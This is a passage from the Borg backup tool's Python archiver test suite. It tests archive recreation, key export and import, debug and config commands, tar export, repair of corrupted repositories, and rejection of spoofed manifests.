self.cmd('extract', self.repository_location + '::test2')
assert os.stat('input/dir1/hardlink').st_nlink == 4
def test_recreate_rechunkify(self):
with open(os.path.join(self.input_path, 'large_file'), 'wb') as fd:
fd.write(b'a' * 280)
fd.write(b'b' * 280)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--chunker-params', '7,9,8,128', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input', '--files-cache=disabled')
list = self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{num_chunks} {unique_chunks}')
num_chunks, unique_chunks = map(int, list.split(' '))
# test1 and test2 do not deduplicate
assert num_chunks == unique_chunks
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
# test1 and test2 do deduplicate after recreate
assert int(self.cmd('list', self.repository_location + '::test1', 'input/large_file', '--format={size}'))
assert not int(self.cmd('list', self.repository_location + '::test1', 'input/large_file',
'--format', '{unique_chunks}'))
def test_recreate_recompress(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '-C', 'none')
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_before = file_list.split(' ')
assert int(csize) >= int(size) # >= due to metadata overhead
self.cmd('recreate', self.repository_location, '-C', 'lz4', '--recompress')
self.check_cache()
file_list = self.cmd('list', self.repository_location + '::test', 'input/compressible',
'--format', '{size} {csize} {sha256}')
size, csize, sha256_after = file_list.split(' ')
assert int(csize) < int(size)
assert sha256_before == sha256_after
def test_recreate_timestamp(self):
local_timezone = datetime.now(timezone(timedelta(0))).astimezone().tzinfo
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test0'
self.cmd('create', archive, 'input')
self.cmd('recreate', '--timestamp', "1970-01-02T00:00:00", '--comment',
'test', archive)
info = self.cmd('info', archive).splitlines()
dtime = datetime(1970, 1, 2) + local_timezone.utcoffset(None)
s_time = dtime.strftime("%Y-%m-%d")
assert any([re.search(r'Time \(start\).+ %s' % s_time, item) for item in info])
assert any([re.search(r'Time \(end\).+ %s' % s_time, item) for item in info])
def test_recreate_dry_run(self):
self.create_regular_file('compressible', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
archives_before = self.cmd('list', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '-n', '-e', 'input/compressible')
self.check_cache()
archives_after = self.cmd('list', self.repository_location + '::test')
assert archives_after == archives_before
def test_recreate_skips_nothing_to_do(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_before = self.cmd('info', self.repository_location + '::test')
self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
self.check_cache()
info_after = self.cmd('info', self.repository_location + '::test')
assert info_before == info_after # includes archive ID
def test_with_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
lock_path = os.path.join(self.repository_path, 'lock.exclusive')
cmd = 'python3', '-c', 'import os, sys; sys.exit(42 if os.path.exists("%s") else 23)' % lock_path
self.cmd('with-lock', self.repository_location, *cmd, fork=True, exit_code=42)
def test_recreate_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=0)
self.create_regular_file('file2', size=0)
self.create_regular_file('file3', size=0)
self.create_regular_file('file4', size=0)
self.create_regular_file('file5', size=0)
self.cmd('create', self.repository_location + '::test', 'input')
output = self.cmd('recreate', '--list', '--info', self.repository_location + '::test', '-e', 'input/file2')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file2", output)
output = self.cmd('recreate', '--list', self.repository_location + '::test', '-e', 'input/file3')
self.check_cache()
self.assert_in("input/file1", output)
self.assert_in("x input/file3", output)
output = self.cmd('recreate', self.repository_location + '::test', '-e', 'input/file4')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file4", output)
output = self.cmd('recreate', '--info', self.repository_location + '::test', '-e', 'input/file5')
self.check_cache()
self.assert_not_in("input/file1", output)
self.assert_not_in("x input/file5", output)
def test_bad_filters(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('delete', '--first', '1', '--last', '1', self.repository_location, fork=True, exit_code=2)
def test_key_export_keyfile(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'r') as fd:
key_contents = fd.read()
assert key_contents == export_contents
os.unlink(key_file)
self.cmd('key', 'import', self.repository_location, export_file)
with open(key_file, 'r') as fd:
key_contents2 = fd.read()
assert key_contents2 == key_contents
def test_key_import_keyfile_with_borg_key_file(self):
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
exported_key_file = os.path.join(self.output_path, 'exported')
self.cmd('key', 'export', self.repository_location, exported_key_file)
key_file = os.path.join(self.keys_path, os.listdir(self.keys_path)[0])
with open(key_file, 'r') as fd:
key_contents = fd.read()
os.unlink(key_file)
imported_key_file = os.path.join(self.output_path, 'imported')
with environment_variable(BORG_KEY_FILE=imported_key_file):
self.cmd('key', 'import', self.repository_location, exported_key_file)
assert not os.path.isfile(key_file), '"borg key import" should respect BORG_KEY_FILE'
with open(imported_key_file, 'r') as fd:
imported_key_contents = fd.read()
assert imported_key_contents == key_contents
def test_key_export_repokey(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
with Repository(self.repository_path) as repository:
repo_key = RepoKey(repository)
repo_key.load(None, Passphrase.env_passphrase())
backup_key = KeyfileKey(key.TestKey.MockRepository())
backup_key.load(export_file, Passphrase.env_passphrase())
assert repo_key.enc_key == backup_key.enc_key
with Repository(self.repository_path) as repository:
repository.save_key(b'')
self.cmd('key', 'import', self.repository_location, export_file)
with Repository(self.repository_path) as repository:
repo_key2 = RepoKey(repository)
repo_key2.load(None, Passphrase.env_passphrase())
assert repo_key2.enc_key == repo_key2.enc_key
def test_key_export_qr(self):
export_file = self.output_path + '/exported.html'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', '--qr-html', self.repository_location, export_file)
with open(export_file, 'r', encoding='utf-8') as fd:
export_contents = fd.read()
assert bin_to_hex(repo_id) in export_contents
assert export_contents.startswith('<!doctype html>')
assert export_contents.endswith('</html>\n')
def test_key_export_directory(self):
export_directory = self.output_path + '/exported'
os.mkdir(export_directory)
self.cmd('init', self.repository_location, '--encryption', 'repokey')
self.cmd('key', 'export', self.repository_location, export_directory, exit_code=EXIT_ERROR)
def test_key_import_errors(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self.cmd('key', 'import', self.repository_location, export_file, exit_code=EXIT_ERROR)
with open(export_file, 'w') as fd:
fd.write('something not a key\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(NotABorgKeyFile):
self.cmd('key', 'import', self.repository_location, export_file)
with open(export_file, 'w') as fd:
fd.write('BORG_KEY a0a0a0\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(RepoIdMismatch):
self.cmd('key', 'import', self.repository_location, export_file)
def test_key_export_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
self.cmd('key', 'export', '--paper', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents == """To restore key use borg key import --paper /path/to/repo
BORG PAPER KEY v1
id: 2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02
1: 616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d
2: 737475 - 88
"""
def test_key_import_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
typed_input = (
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 02\n' # Forgot to type "-"
b'2 / e29442 3506da 4e1ea7 25f62a 5a3d41 - 02\n' # Forgot to type second "/"
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d42 - 02\n' # Typo (..42 not ..41)
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n' # Correct! Congratulations
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'\n\n' # Abort [yN] => N
b'737475 88\n' # missing "-"
b'73747i - 88\n' # typo
b'73747 - 88\n' # missing nibble
b'73 74 75 - 89\n' # line checksum mismatch
b'00a1 - 88\n' # line hash collision - overall hash mismatch, have to start over
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'73 74 75 - 88\n'
)
# In case that this has to change, here is a quick way to find a colliding line hash:
#
# from hashlib import sha256
# hash_fn = lambda x: sha256(b'\x00\x02' + x).hexdigest()[:2]
# for i in range(1000):
# if hash_fn(i.to_bytes(2, byteorder='big')) == '88': # 88 = line hash
# print(i.to_bytes(2, 'big'))
# break
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
# Test abort paths
typed_input = b'\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
typed_input = b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
def test_debug_dump_manifest(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-manifest', self.repository_location, dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert 'archives' in result
assert 'config' in result
assert 'item_keys' in result
assert 'timestamp' in result
assert 'version' in result
def test_debug_dump_archive(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-archive', self.repository_location + "::test", dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert '_name' in result
assert '_manifest_entry' in result
assert '_meta' in result
assert '_items' in result
def test_debug_refcount_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('debug', 'refcount-obj', self.repository_location, '0' * 64).strip()
assert output == 'object 0000000000000000000000000000000000000000000000000000000000000000 not found [info from chunks cache].'
create_json = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
archive_id = create_json['archive']['id']
output = self.cmd('debug', 'refcount-obj', self.repository_location, archive_id).strip()
assert output == 'object ' + archive_id + ' has 1 referrers [info from chunks cache].'
# Invalid IDs do not abort or return an error
output = self.cmd('debug', 'refcount-obj', self.repository_location, '124', 'xyza').strip()
assert output == 'object id 124 is invalid.\nobject id xyza is invalid.'
def test_debug_info(self):
output = self.cmd('debug', 'info')
assert 'CRC implementation' in output
assert 'Python' in output
def test_benchmark_crud(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
with environment_variable(_BORG_BENCHMARK_CRUD_TEST='YES'):
self.cmd('benchmark', 'crud', self.repository_location, self.input_path)
def test_config(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('config', '--list', self.repository_location)
self.assert_in('[repository]', output)
self.assert_in('version', output)
self.assert_in('segments_per_dir', output)
self.assert_in('storage_quota', output)
self.assert_in('append_only', output)
self.assert_in('additional_free_space', output)
self.assert_in('id', output)
self.assert_not_in('last_segment_checked', output)
output = self.cmd('config', self.repository_location, 'last_segment_checked', exit_code=1)
self.assert_in('No option ', output)
self.cmd('config', self.repository_location, 'last_segment_checked', '123')
output = self.cmd('config', self.repository_location, 'last_segment_checked')
assert output == '123' + '\n'
output = self.cmd('config', '--list', self.repository_location)
self.assert_in('last_segment_checked', output)
self.cmd('config', '--delete', self.repository_location, 'last_segment_checked')
for cfg_key, cfg_value in [
('additional_free_space', '2G'),
('repository.append_only', '1'),
]:
output = self.cmd('config', self.repository_location, cfg_key)
assert output == '0' + '\n'
self.cmd('config', self.repository_location, cfg_key, cfg_value)
output = self.cmd('config', self.repository_location, cfg_key)
assert output == cfg_value + '\n'
self.cmd('config', '--delete', self.repository_location, cfg_key)
self.cmd('config', self.repository_location, cfg_key, exit_code=1)
self.cmd('config', '--list', '--delete', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, 'invalid-option', exit_code=1)
requires_gnutar = pytest.mark.skipif(not have_gnutar(), reason='GNU tar must be installed for this test.')
requires_gzip = pytest.mark.skipif(not shutil.which('gzip'), reason='gzip must be installed for this test.')
@requires_gnutar
def test_export_tar(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--progress')
with changedir('output'):
# This probably assumes GNU tar. Note -p switch to extract permissions regardless of umask.
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
@requires_gzip
def test_export_tar_gz(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar.gz', '--list')
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar.gz', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
def test_export_tar_strip_components(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--strip-components=1', '--list')
# --list's path are those before processing with --strip-components
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_hardlinks
@requires_gnutar
def test_export_tar_strip_components_links(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', '--strip-components=2')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
@requires_hardlinks
@requires_gnutar
def test_extract_hardlinks_tar(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', 'input/dir1')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
def test_detect_attic_repo(self):
path = make_attic_repo(self.repository_path)
cmds = [
['create', path + '::test', self.tmpdir],
['extract', path + '::test'],
['check', path],
['rename', path + '::test', 'newname'],
['list', path],
['delete', path],
['prune', path],
['info', path + '::test'],
['key', 'export', path, 'exported'],
['key', 'import', path, 'import'],
['key', 'change-passphrase', path],
['break-lock', path],
]
for args in cmds:
output = self.cmd(*args, fork=True, exit_code=2)
assert 'Attic repository detected.' in output
@unittest.skipUnless('binary' in BORG_EXES, 'no borg.exe available')
class ArchiverTestCaseBinary(ArchiverTestCase):
EXE = 'borg.exe'
FORK_DEFAULT = True
@unittest.skip('does not raise Exception, but sets rc==2')
def test_init_parent_dirs(self):
pass
@unittest.skip('patches objects')
def test_init_interrupt(self):
pass
@unittest.skip('patches objects')
def test_extract_capabilities(self):
pass
@unittest.skip('patches objects')
def test_extract_xattrs_errors(self):
pass
@unittest.skip('test_basic_functionality seems incompatible with fakeroot and/or the binary.')
def test_basic_functionality(self):
pass
@unittest.skip('test_overwrite seems incompatible with fakeroot and/or the binary.')
def test_overwrite(self):
pass
def test_fuse(self):
if fakeroot_detected():
unittest.skip('test_fuse with the binary is not compatible with fakeroot')
else:
super().test_fuse()
class ArchiverCheckTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1')
self.create_src_archive('archive2')
def test_check_usage(self):
output = self.cmd('check', '-v', '--progress', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
self.assert_in('Checking segments', output)
# reset logging to new process default to avoid need for fork=True on next check
logging.getLogger('borg.output.progress').setLevel(logging.NOTSET)
output = self.cmd('check', '-v', '--repository-only', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_not_in('Starting archive consistency check', output)
self.assert_not_in('Checking segments', output)
output = self.cmd('check', '-v', '--archives-only', self.repository_location, exit_code=0)
self.assert_not_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
output = self.cmd('check', '-v', '--archives-only', '--prefix=archive2', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
output = self.cmd('check', '-v', '--archives-only', '--first=1', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_not_in('archive2', output)
output = self.cmd('check', '-v', '--archives-only', '--last=1', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
self.assert_in('archive2', output)
def test_missing_file_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
valid_chunks = item.chunks
killed_chunk = valid_chunks[-1]
repository.delete(killed_chunk.id)
break
else:
self.fail('should not happen')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.assert_in('New missing file chunk detected', output)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_in('broken#', output)
# check that the file in the old archives has now a different chunk list without the killed chunk
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_not_equal(valid_chunks, item.chunks)
self.assert_not_in(killed_chunk, item.chunks)
break
else:
self.fail('should not happen')
# do a fresh backup (that will include the killed chunk)
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.create_src_archive('archive3')
# check should be able to heal the file now:
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('Healed previously missing file chunk', output)
self.assert_in('testsuite/archiver.py: Completely healed previously damaged file!', output)
# check that the file in the old archives has the correct chunks again
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_equal(valid_chunks, item.chunks)
break
else:
self.fail('should not happen')
# list is also all-healthy again
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_not_in('broken#', output)
def test_missing_archive_item_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.metadata.items[0])
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_archive_metadata(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.id)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(Manifest.MANIFEST_ID)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_corrupted_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_corrupted_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
chunk = repository.get(archive.id)
corrupted_chunk = chunk + b'corrupted!'
repository.put(archive.id, corrupted_chunk)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_duplicate_archive(self):
archive, repository = self.open_archive('archive1')
key = archive.key
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
archive = msgpack.packb({
'cmdline': [],
'items': [],
'hostname': 'foo',
'username': 'bar',
'name': 'archive1',
'time': '2016-12-15T18:49:51.849711',
'version': 1,
})
archive_id = key.id_hash(archive)
repository.put(archive_id, key.encrypt(archive))
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
output = self.cmd('list', self.repository_location)
self.assert_in('archive1', output)
self.assert_in('archive1.1', output)
self.assert_in('archive2', output)
def test_extra_chunks(self):
self.cmd('check', self.repository_location, exit_code=0)
with Repository(self.repository_location, exclusive=True) as repository:
repository.put(b'01234567890123456789012345678901', b'xxxx')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('extract', '--dry-run', self.repository_location + '::archive1', exit_code=0)
def _test_verify_data(self, *init_args):
shutil.rmtree(self.repository_path)
self.cmd('init', self.repository_location, *init_args)
self.create_src_archive('archive1')
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
chunk = item.chunks[-1]
data = repository.get(chunk.id) + b'1234'
repository.put(chunk.id, data)
break
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('check', '--verify-data', self.repository_location, exit_code=1)
assert bin_to_hex(chunk.id) + ', integrity error' in output
# repair (heal is tested in another test)
output = self.cmd('check', '--repair', '--verify-data', self.repository_location, exit_code=0)
assert bin_to_hex(chunk.id) + ', integrity error' in output
assert 'testsuite/archiver.py: New missing file chunk detected' in output
def test_verify_data(self):
self._test_verify_data('--encryption', 'repokey')
def test_verify_data_unencrypted(self):
self._test_verify_data('--encryption', 'none')
def test_empty_repository(self):
with Repository(self.repository_location, exclusive=True) as repository:
for id_ in repository.list():
repository.delete(id_)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
def test_attic013_acl_bug(self):
# Attic up to release 0.13 contained a bug where every item unintentionally received
# a b'acl'=None key-value pair.
# This bug can still live on in Borg repositories (through borg upgrade).
class Attic013Item:
def as_dict(self):
return {
# These are required
b'path': '1234',
b'mtime': 0,
b'mode': 0,
b'user': b'0',
b'group': b'0',
b'uid': 0,
b'gid': 0,
# acl is the offending key.
b'acl': None,
}
archive, repository = self.open_archive('archive1')
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
archive = Archive(repository, key, manifest, '0.13', cache=cache, create=True)
archive.items_buffer.add(Attic013Item())
archive.save()
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('list', self.repository_location + '::0.13', exit_code=0)
class ManifestAuthenticationTest(ArchiverTestCaseBase):
def spoof_manifest(self, repository):
with repository:
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'config': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
def test_fresh_init_tam_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
def test_not_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
with repository:
shutil.rmtree(get_security_dir(bin_to_hex(repository.id)))
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
key.tam_required = False
key.change_passphrase(key._passphrase)
manifest = msgpack.unpackb(key.decrypt(None, repository.get(Manifest.MANIFEST_ID)))
del manifest[b'tam']
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb(manifest)))
repository.commit(compact=False)
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM not found and not required' in output
# Run upgrade
self.cmd('upgrade', '--tam', self.repository_location)
# Manifest must be authenticated now
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM-verified manifest' in output
# Try to spoof / modify pre-1.0.9
self.spoof_manifest(repository)
# Fails
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
# Force upgrade
self.cmd('upgrade', '--tam', '--force', self.repository_location)
self.cmd('list', self.repository_location)
def test_disable(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
self.cmd('upgrade', '--disable-tam', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
assert not self.cmd('list', self.repository_location)
def test_disable2(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
self.cmd('upgrade', '--disable-tam', self.repository_location)
assert not self.cmd('list', self.repository_location)
class RemoteArchiverTestCase(ArchiverTestCase):
prefix = '__testsuite__:'
def open_repository(self):
return RemoteRepository(Location(self.repository_location))
def test_remote_repo_restrict_to_path(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
# restricted to repo directory itself, fail for other directories with same prefix:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_0')
# restricted to a completely different path:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo']):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_1')
path_prefix = os.path.dirname(self.repository_path)
# restrict to repo directory's parent directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_2')
# restrict to repo directory's parent directory and another directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo', '--restrict-to-path', path_prefix]):
